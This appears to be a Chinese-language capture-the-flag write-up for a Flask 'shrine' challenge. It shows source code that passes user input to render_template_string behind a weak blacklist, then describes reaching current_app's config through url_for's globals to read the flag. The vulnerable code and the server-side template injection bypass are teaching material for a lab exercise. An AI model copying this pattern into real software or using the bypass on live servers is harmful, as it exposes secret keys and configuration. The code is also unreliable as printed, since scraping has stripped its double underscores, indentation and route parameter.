import flask
    import os

    app = flask.Flask(name) #代码中的app提示flag可能在app的config里
    app.config[‘FLAG’] = os.environ.pop(‘FLAG’) #推测flag在config里

    @app.route(‘/‘)
    def index():
    return open(file).read()

    @app.route(‘/shrine/‘)
    def shrine(shrine):
    def safe_jinja(s):
    s = s.replace(‘(‘, ‘’).replace(‘)’, ‘’) #把左右括号替换成空格
    blacklist = [‘config’, ‘self’] #过滤config,self,就不能用{{config}}
    return ‘’.join([‘{{% set {}=None%}}’.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))

    if name == ‘main‘:
    app.run(debug=True)

    使用内置函数urlfor获取全局变量{{urlfor.__globals}}
    h1.png
    看到current_app,获取其config
    h2.png
    得到flag